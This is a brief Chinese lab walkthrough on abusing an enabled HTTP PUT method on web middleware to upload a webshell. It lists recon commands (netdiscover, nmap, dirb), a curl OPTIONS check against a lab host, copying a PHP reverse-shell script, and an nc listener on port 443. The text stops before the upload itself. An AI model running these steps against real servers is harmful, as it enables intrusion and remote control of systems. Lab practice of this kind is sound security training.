赞
踩
我们常见的中间件有apache,tomcat,IIS,weblogic(其实就是web容器),这些中间件可以设置支持的HTTP方法。每一个HTTP方法都有其对应的功能,在这些方法中,PUT可以直接从客户机上传文件到服务器。如果中间件开放了HTTP中的PUT方法,那么恶意攻击者就可以直接上传webshell到对应的服务器上。
链接:https://pan.baidu.com/s/1l_LILZgjUZ6ASrFQq9X22A
提取码:lsq0
netdiscover -i eth0
nmap -sV 192.168.75.158
dirb http://192.168.75.158
curl -v -X OPTIONS http://192.168.75.158/test
发现允许使用PUT上传文件,初步验证存在PUT上传漏洞
cp /usr/share/webshells/php/php-reverse-shell.php /root/Desktop/shell.php
nc -nlvp 443
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。